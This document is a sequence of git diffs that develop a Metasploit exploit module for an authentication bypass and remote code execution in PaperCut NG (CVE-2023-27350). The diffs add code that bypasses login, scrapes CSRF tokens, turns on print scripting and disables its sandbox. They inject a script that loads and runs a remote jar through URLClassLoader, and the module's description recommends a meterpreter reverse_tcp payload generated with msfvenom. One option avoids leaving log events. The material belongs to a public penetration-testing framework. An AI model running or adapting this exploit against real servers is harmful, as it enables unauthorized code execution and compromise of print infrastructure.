@@ -37,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Stance' => Msf::Exploit::Stance::Aggressive,
         'Targets' => [ [ 'Automatic Target', {}] ],
         'Platform' => [ 'java' ],
-        'Payload' => {},
+        'Arch' => ARCH_JAVA,
         'Privileged' => true,
         'DisclosureDate' => '2023-03-13',
         'DefaultTarget' => 0,
@@ -56,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
-        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application'])
+        OptInt.new('HTTPDELAY', [false, '...'], 10)
       ], self.class
     )
   end
@@ -76,7 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil unless res && res.code == 200
 
     vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")
-    res.get_html_document.xpath('//script')[-1].text.split("'")[1]
+match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)
+match ? match[:csrf] : ''
   end
 
   def get_config_option(name)
@@ -154,11 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'enablePrintScript' => 'on',
           '$Submit$1' => 'Apply',
           'printerId' => 'l1001',
-          'scriptBody' => %{
-var urls = [new java.net.URL("#{payload_uri}.jar")];
-var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);
-s;
-}
+          'scriptBody' => script
         }
       }
     )
@@ -180,7 +178,7 @@ s;
 
     # Main function
     # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.
-    @csrf_token = bypass_auth
+    @csrf_token = bypass_auth unless @csrf_token
     if @csrf_token.nil?
       fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -211,7 +211,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     # Main function
     # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.
-    @csrf_token = bypass_auth unless @csrf_token
+    @csrf_token ||= bypass_auth
     if @csrf_token.nil?
       fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
-        OptInt.new('HTTPDELAY', [false, '...'], 10)
+        OptInt.new('HTTPDELAY', [false, '...', 10])
       ], self.class
     )
   end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -23,15 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
           and 'print.script.sandboxed' options to allow for arbitrary code execution running in
           the builtin RhinoJS engine.
 
-          For code injection we utilize the URLClassLoader to load a remote URL containing a
-          ".jar" file, this file must already exist and must contain a "main" method accepting
-          no command line arguments. We recommend generating this jar file using msfvenom with a
-          java/meterpreter/reverse_tcp payload, e.g. `msfvenom -p java/meterpreter/reverse_tcp --format jar --encoder generic/none
-          LHOST=[lhost] LPORT=[lport] -o shell.jar
-
           This module logs at most 2 events in the application log of papercut. Each event is tied
-          to modifcation of server settings. Use NEVER_SET to avoid log generation entirely when
-          targeting already vulnerable systes.
+          to modifcation of server settings.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'catatonicprime' ],

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -45,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'DisablePayloadHandler' => true,
+          'PAYLOAD' => 'java/meterpreter/reverse_tcp',
           'RPORT' => '9191',
           'SSL' => 'false',
           'TARGETURI' => '/app',

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -17,6 +17,20 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'PaperCut PaperCutNG Authentication Bypass',
         'Description' => %q{
+          This module leverages an authentication bypass in PaperCut NG. If necessary it
+          updates Papercut configuration options, specifically the 'print-and-device.script.enabled'
+          and 'print.script.sandboxed' options to allow for arbitrary code execution running in
+          the builtin RhinoJS engine.
+
+          For code injection we utilize the URLClassLoader to load a remote URL containing a
+          ".jar" file, this file must already exist and must contain a "main" method accepting
+          no command line arguments. We recommend generating this jar file using msfvenom with a
+          java/meterpreter/reverse_tcp payload, e.g. `msfvenom -p java/meterpreter/reverse_tcp --format jar --encoder generic/none
+          LHOST=[lhost] LPORT=[lport] -o shell.jar
+
+          This module logs at most 2 events in the application log of papercut. Each event is tied
+          to modifcation of server settings. Use NEVER_SET to avoid log generation entirely when
+          targeting already vulnerable systes.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'catatonicprime' ],
@@ -24,10 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
         ],
         'Targets' => [ [ 'Automatic Target', {}] ],
-        'Platform' => [ 'win', 'linux'],
-        'Payload' => {
-          'BadChars' => "\x00"
-        },
+        'Platform' => [ 'java' ],
+        'Payload' => {},
         'Privileged' => true,
         'DisclosureDate' => '2023-03-13',
         'DefaultTarget' => 0,
@@ -51,7 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'Path to the papercut application']),
         OptString.new('PAYLOAD_CLASS', [false, 'Class containing main method to load']),
         OptString.new('JAR_FILE', [true, 'Local path to jar file to serve, e.g. msfvenom output jar file']),
-        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application'])
+        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application']),
+        OptBool.new('NEVER_SET', [false, 'Never set server options to avoid unnecessary log events.'])
       ], self.class
     )
   end
@@ -74,11 +87,70 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Appears
   end
 
-  def set_server_option
+  def set_server_option(name, value)
     # set name:value pair(s)
     # 1) do a quickfind (setting the tapestry state)
-    # 2) if no property found, add it?
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'headers' => {
+          'Origin' => @origin
+        },
+        'vars_post' => {
+          'service' => 'direct/1/ConfigEditor/quickFindForm',
+          'sp' => 'S0',
+          'Form0' => '$TextField,doQuickFind,clear',
+          '$TextField' => name,
+          'doQuickFind' => 'Go'
+        }
+      }
+    )
+    # TODO: 2) if no property found, add it?
     # 3) else, if necessary, do an update
+    if not res || res.code != 200
+      print_error("Response error when attempting to find server option '#{name}'")
+      return Exploit::Failed
+    end
+
+    html = res.get_html_document
+    td = html.xpath("//td[@class='propertyNameColumnValue']")
+    if not td || td.count != 1 || td.text != name
+      print_error("xpath error: could not find single <td> containing server option '#{name}'") unless td && td.count == 1 && td.text == name
+      return Exploit::Failed
+    end
+
+    value_input = html.xpath("//input[@name='$TextField$0']")
+    current_value = value_input[0]['value']
+    if current_value == value
+      vprint_good("Server option '#{name}' already set to '#{value}')")
+      return
+    end
+
+    if datastore['NEVER_SET']
+      print_error("Server is not correctly configured for code execution and you have requested we never set server options 'NEVER_SET'")
+      return Exploit::Failed
+    end
+
+    vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'")
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'headers' => {
+          'Origin' => @origin
+        },
+        'vars_post' => {
+          'service' => 'direct/1/ConfigEditor/$Form',
+          'sp' => 'S1',
+          'Form1' => '$TextField$0,$Submit,$Submit$0',
+          '$TextField$0' => value,
+          '$Submit' => 'Update'
+        }
+      }
+    )
   end
 
   def get_printer
@@ -145,21 +217,40 @@ s;
 
   def exploit
     @payload_uri = get_uri
-    # Main function
-    # 1) Bypass the auth using the SetupCompleted page
-    bypass_auth
-    # 2) Enable scripts, if needed
-    # 3) Disable sandboxing, if needed
-    # 4) Find a printerId
-    @printer_id = get_printer
-    print_status('Using printerid: ' + @printer_id)
-
-    # 5) Select the printer, this loads it into the tapestry session to be modified
     protocol = 'http'
     if datastore['SSL']
       protocol = 'https'
     end
-    @origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}")
+    @origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}") # required for anti-CSRF mechanisms
+
+    # Main function
+    # 1) Bypass the auth using the SetupCompleted page
+    auth_bypassed = bypass_auth
+    if auth_bypassed == Exploit::CheckCode::Safe
+      print_error('Server appears to not be vulnerable.')
+      return Exploit::Failed
+    end
+    # 2) Enable scripts, if needed
+    success = set_server_option('print-and-device.script.enabled', 'Y')
+    if success == Exploit::Failed
+      return Exploit::Failed
+    end
+
+    # 3) Disable sandboxing, if needed
+    success = set_server_option('print.script.sandboxed', 'N')
+    if success == Exploit::Failed
+      return Exploit::Failed
+    end
+
+    # 4) Find a printerId
+    @printer_id = get_printer
+    if @printer_id == Exploit::Failed
+      return Exploit::Failed
+    end
+
+    vprint_status('Using printerid: ' + @printer_id)
+
+    # 5) Select the printer, this loads it into the tapestry session to be modified
     res = send_request_cgi(
       {
         'method' => 'GET',

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -44,6 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-03-13',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
+          'DisablePayloadHandler' => true,
           'RPORT' => '9191',
           'SSL' => 'false',
           'TARGETURI' => '/app',
@@ -84,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return Exploit::CheckCode::Safe unless res && res.code == 200
 
-    return Exploit::CheckCode::Appears
+    return Exploit::CheckCode::Vulnerable
   end
 
   def set_server_option(name, value)

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => ['catatonicprime'],
         'References' => [
           ['CVE', '2023–27350'],
-          ['ZDI', 'CAN-18987'],
+          ['ZDI', '23-233'],
           ['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'],
           ['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'],
           ['URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -243,6 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     Timeout.timeout(datastore['HTTPDELAY']) { super }
   rescue Timeout::Error
+    # When the server stop due to our timeout, this is raised
   end
 
   def on_request_uri(cli, request)

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -40,6 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],
           [ 'URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software' ]
         ],
+        'Stance' => Msf::Exploit::Stance::Aggressive,
         'Targets' => [ [ 'Automatic Target', {}] ],
         'Platform' => [ 'java' ],
         'Payload' => {},

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -59,6 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
       ], self.class
     )
+    @csrf_token = nil
   end
 
   def bypass_auth

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -68,7 +68,6 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
         OptString.new('PAYLOAD_CLASS', [false, 'Class containing main method to load']),
-        OptString.new('JAR_FILE', [true, 'Local path to jar file to serve, e.g. msfvenom output jar file']),
         OptInt.new('HTTPDELAY', [false, 'Path to the papercut application']),
         OptBool.new('NEVER_SET', [false, 'Never set server options to avoid unnecessary log events.'])
       ], self.class
@@ -237,7 +236,7 @@ s;
 
   def on_request_uri(cli, request)
     vprint_status("Sending payload for requested uri: #{request.uri}")
-    jar_file = File.read(datastore['JAR_FILE'])
+    jar_file = payload.raw
     send_response(cli, jar_file)
   end
 

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -158,39 +158,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def get_printer
-    res = send_request_cgi(
-      {
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path),
-        'keep_cookies' => true,
-        'vars_get' => {
-          'service' => 'page/PrinterList'
-        }
-      }
-    )
-    return Exploit::Failed unless res && res.code == 200
-
-    html = res.get_html_document
-    return Exploit::Failed unless html
-
-    printer = html.at('.displayNameColumnValue a')
-    return Exploit::Failed unless printer && printer['href']
-
-    uri = URI(normalize_uri(printer['href']))
-    return Exploit::Failed unless uri
-
-    params = CGI.parse(uri.query)
-    return Exploit::Failed unless params && params['sp']
-
-    return params['sp'][0]
-  end
-
-  def check
-    # For the check command
-    return bypass_auth
-  end
-
   def primer
     payload_uri = get_uri
     # 6) Trigger the code execution the printer_id
@@ -208,7 +175,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Form0' => 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0,$Submit$1',
           'enablePrintScript' => 'on',
           '$Submit$1' => 'Apply',
-          'printerId' => @printer_id,
+          'printerId' => 'l1001',
           'scriptBody' => %Q{
 var urls = [new java.net.URL("#{payload_uri}.jar")];
 var cl = new java.net.URLClassLoader(urls).loadClass('#{datastore['PAYLOAD_CLASS']}').newInstance().main([]);
@@ -247,14 +214,6 @@ s;
       return Exploit::Failed
     end
 
-    # 4) Find a printerId
-    @printer_id = get_printer
-    if @printer_id == Exploit::Failed
-      return Exploit::Failed
-    end
-
-    vprint_status('Using printerid: ' + @printer_id)
-
     # 5) Select the printer, this loads it into the tapestry session to be modified
     res = send_request_cgi(
       {
@@ -266,7 +225,7 @@ s;
         },
         'vars_get' => {
           'service' => 'direct/1/PrinterList/selectPrinter',
-          'sp' => @printer_id
+          'sp' => 'l1001'
         }
       }
     )

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -49,10 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-03-13',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'PAYLOAD' => 'java/meterpreter/reverse_tcp',
           'RPORT' => '9191',
           'SSL' => 'false',
-          'JAR_FILE' => '',
           'HTTPDELAY' => 10
         },
         'Notes' => {
@@ -65,8 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
-        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application']),
-        OptBool.new('NEVER_SET', [false, 'Never set server options to avoid unnecessary log events.'])
+        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application'])
       ], self.class
     )
   end
@@ -122,11 +119,6 @@ class MetasploitModule < Msf::Exploit::Remote
     if current_value == value
       vprint_good("Server option '#{name}' already set to '#{value}')")
       return
-    end
-
-    if datastore['NEVER_SET']
-      print_error("Server is not correctly configured for code execution and you have requested we never set server options 'NEVER_SET'")
-      return Exploit::Failed
     end
 
     vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'")

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -141,6 +141,11 @@ match ? match[:csrf] : ''
 
   def primer
     payload_uri = get_uri
+    script = <<~SCRIPT
+      var urls = [new java.net.URL("#{payload_uri}.jar")];
+      var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);
+      s;
+    SCRIPT
     # 6) Trigger the code execution the printer_id
     res = send_request_cgi(
       {

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -92,8 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res.get_html_document.xpath('//script')[-1].text.split("'")[1]
   end
 
-  def set_server_option(name, value)
-    # set name:value pair(s)
+  def get_config_option(name)
     # 1) do a quickfind (setting the tapestry state)
     res = send_request_cgi(
       {
@@ -113,21 +112,18 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     # TODO: 2) if no property found, add it?
-    # 3) else, if necessary, do an update
-    if not res || res.code != 200
-      print_error("Response error when attempting to find server option '#{name}'")
-      return Exploit::Failed
-    end
-
-    html = res.get_html_document
-    td = html.xpath("//td[@class='propertyNameColumnValue']")
-    if not td || td.count != 1 || td.text != name
-      print_error("xpath error: could not find single <td> containing server option '#{name}'") unless td && td.count == 1 && td.text == name
-      return Exploit::Failed
-    end
+    # 3) parse the result
+    return nil unless res && res.code == 200 && html = res.get_html_document
+    return nil unless td = html.xpath("//td[@class='propertyNameColumnValue']")
+    return nil unless td.count == 1 && td.text == name
 
     value_input = html.xpath("//input[@name='$TextField$0']")
-    current_value = value_input[0]['value']
+    value_input[0]['value']
+  end
+
+  def set_config_option(name, value)
+    # set name:value pair(s)
+    current_value = get_config_option(name)
     if current_value == value
       vprint_good("Server option '#{name}' already set to '#{value}')")
       return
@@ -212,13 +208,13 @@ s;
     end
 
     # 2) Enable scripts, if needed
-    success = set_server_option('print-and-device.script.enabled', 'Y')
+    success = set_config_option('print-and-device.script.enabled', 'Y')
     if success == Exploit::Failed
       return Exploit::Failed
     end
 
     # 3) Disable sandboxing, if needed
-    success = set_server_option('print.script.sandboxed', 'N')
+    success = set_config_option('print.script.sandboxed', 'N')
     if success == Exploit::Failed
       return Exploit::Failed
     end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -9,6 +9,7 @@ require 'cgi'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(
@@ -31,9 +32,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-03-13',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'RPORT' => '9192',
-          'SSL' => 'True',
-          'TARGETURI' => '/app'
+          'RPORT' => '9191',
+          'SSL' => 'false',
+          'TARGETURI' => '/app',
+          'PAYLOAD_CLASS' => 'metasploit.Payload',
+          'JAR_FILE' => '',
+          'HTTPDELAY' => 10
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -44,7 +48,10 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Path to the papercut application'])
+        OptString.new('TARGETURI', [true, 'Path to the papercut application']),
+        OptString.new('PAYLOAD_CLASS', [false, 'Class containing main method to load']),
+        OptString.new('JAR_FILE', [true, 'Local path to jar file to serve, e.g. msfvenom output jar file']),
+        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application'])
       ], self.class
     )
   end
@@ -107,46 +114,16 @@ class MetasploitModule < Msf::Exploit::Remote
     return bypass_auth
   end
 
-  def exploit
-    # Main function
-    # 1) Bypass the auth using the SetupCompleted page
-    bypass_auth
-    # 2) Enable scripts, if needed
-    # 3) Disable sandboxing, if needed
-    # 4) Find a printerId
-    printer_id = get_printer
-    print_status('Using printerid: ' + printer_id)
-
-    # 5) Select the printer, this loads it into the tapestry session to be modified
-    protocol = 'http'
-    if datastore['SSL']
-      protocol = 'https'
-    end
-    origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}")
-    res = send_request_cgi(
-      {
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path),
-        'keep_cookies' => true,
-        'headers' => {
-          'Origin' => origin
-        },
-        'vars_get' => {
-          'service' => 'direct/1/PrinterList/selectPrinter',
-          'sp' => printer_id
-        }
-      }
-    )
-    return Exploit::Failed unless res && res.code == 200
-
-    # 6) Exploit a printer using the printer_id
+  def primer
+    payload_uri = get_uri
+    # 6) Trigger the code execution the printer_id
     res = send_request_cgi(
       {
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path),
         'keep_cookies' => true,
         'headers' => {
-          'Origin' => origin
+          'Origin' => @origin
         },
         'vars_post' => {
           'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',
@@ -154,14 +131,59 @@ class MetasploitModule < Msf::Exploit::Remote
           'Form0' => 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0,$Submit$1',
           'enablePrintScript' => 'on',
           '$Submit$1' => 'Apply',
-          'printerId' => printer_id,
-          'scriptBody' => %q{
-var rt = new java.lang.Runtime.getRuntime();
-rt.exec('c:\\\\windows\\\\system32\\\\cmd.exe /c "ping 192.168.1.3"');
-s;}
+          'printerId' => @printer_id,
+          'scriptBody' => %Q{
+var urls = [new java.net.URL("#{payload_uri}.jar")];
+var cl = new java.net.URLClassLoader(urls).loadClass('#{datastore['PAYLOAD_CLASS']}').newInstance().main([]);
+s;
+}
         }
       }
     )
     return Exploit::Failed unless res && res.code == 200
   end
+
+  def exploit
+    @payload_uri = get_uri
+    # Main function
+    # 1) Bypass the auth using the SetupCompleted page
+    bypass_auth
+    # 2) Enable scripts, if needed
+    # 3) Disable sandboxing, if needed
+    # 4) Find a printerId
+    @printer_id = get_printer
+    print_status('Using printerid: ' + @printer_id)
+
+    # 5) Select the printer, this loads it into the tapestry session to be modified
+    protocol = 'http'
+    if datastore['SSL']
+      protocol = 'https'
+    end
+    @origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}")
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'headers' => {
+          'Origin' => @origin
+        },
+        'vars_get' => {
+          'service' => 'direct/1/PrinterList/selectPrinter',
+          'sp' => @printer_id
+        }
+      }
+    )
+    return Exploit::Failed unless res && res.code == 200
+
+    Timeout.timeout(datastore['HTTPDELAY']) { super }
+  rescue Timeout::Error
+  end
+
+  def on_request_uri(cli, request)
+    vprint_status("Sending payload for requested uri: #{request.uri}")
+    jar_file = File.read(datastore['JAR_FILE'])
+    send_response(cli, jar_file)
+  end
+
 end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
         }
       )
     )

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -78,8 +78,8 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil unless res && res.code == 200
 
     vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")
-match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)
-match ? match[:csrf] : ''
+    match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)
+    match ? match[:csrf] : ''
   end
 
   def get_config_option(name)

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -211,7 +211,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     # Main function
     # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.
-    @csrf_token ||= bypass_auth
+    bypass_auth unless @csrf_token
     if @csrf_token.nil?
       fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -8,6 +8,7 @@ require 'cgi'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
 

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -60,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ], self.class
     )
     @csrf_token = nil
+    @config_cleanup = []
   end
 
   def bypass_auth
@@ -117,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
     value_input[0]['value']
   end
 
-  def set_config_option(name, value)
+  def set_config_option(name, value, rollback)
     # set name:value pair(s)
     current_value = get_config_option(name)
     if current_value == value
@@ -144,6 +145,21 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     fail_with Failure::NotVulnerable, "Could not update server config option '#{name}' to value of '#{value}'" unless res && res.code == 200
+    # skip storing the cleanup change if this is rolling back a previous change
+    @config_cleanup.push([name, current_value]) unless rollback
+  end
+
+  def cleanup
+    super
+    if @config_cleanup.nil?
+      return
+    end
+
+    until @config_cleanup.empty?
+      cfg = @config_cleanup.pop
+      vprint_status("Rolling back '#{cfg[0]}' to '#{cfg[1]}'")
+      set_config_option(cfg[0], cfg[1], true)
+    end
   end
 
   def primer
@@ -205,10 +221,10 @@ class MetasploitModule < Msf::Exploit::Remote
     # Sandboxing wasn't introduced until version 19
     if @version_major >= 19
       # 2) Enable scripts, if needed
-      set_config_option('print-and-device.script.enabled', 'Y')
+      set_config_option('print-and-device.script.enabled', 'Y', false)
 
       # 3) Disable sandboxing, if needed
-      set_config_option('print.script.sandboxed', 'N')
+      set_config_option('print.script.sandboxed', 'N', false)
     end
     # 5) Select the printer, this loads it into the tapestry session to be modified
     res = send_request_cgi(

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -75,8 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def bypass_auth
-    # Hit the SetupCompleted Page & establish an authenticated session.
-    # Return success/fail or vuln/not vuln based on response values
+    # Attempt to generate a session & recover the anti-csrf token for future requests.
     res = send_request_cgi(
       {
         'method' => 'GET',
@@ -87,9 +86,9 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       }
     )
-    return Exploit::CheckCode::Safe unless res && res.code == 200
-
-    return Exploit::CheckCode::Vulnerable
+    return nil unless res && res.code == 200
+    vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")
+    res.get_html_document.xpath('//script')[-1].text.split("'")[1]
   end
 
   def set_server_option(name, value)
@@ -187,6 +186,15 @@ s;
     return Exploit::Failed unless res && res.code == 200
   end
 
+  def check
+    # For the check command
+    bypass_success = bypass_auth
+    if bypass_success.nil?
+      return Exploit::CheckCode::Safe
+    end
+    return Exploit::CheckCode::Vulnerable
+  end
+
   def exploit
     @payload_uri = get_uri
     protocol = 'http'
@@ -196,12 +204,12 @@ s;
     @origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}") # required for anti-CSRF mechanisms
 
     # Main function
-    # 1) Bypass the auth using the SetupCompleted page
-    auth_bypassed = bypass_auth
-    if auth_bypassed == Exploit::CheckCode::Safe
-      print_error('Server appears to not be vulnerable.')
-      return Exploit::Failed
+    # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.
+    @csrf_token = bypass_auth
+    if @csrf_token.nil?
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end
+
     # 2) Enable scripts, if needed
     success = set_server_option('print-and-device.script.enabled', 'Y')
     if success == Exploit::Failed

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -1,0 +1,56 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PaperCut PaperCutNG Authentication Bypass',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'catatonicprime' ],
+        'References' => [
+          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
+        ],
+        'Platform' => [ 'win', 'linux'],
+        'Payload' => {
+          'BadChars' => "\x00"
+        },
+        'Privileged' => true,
+        'DisclosureDate' => '2023-03-13',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
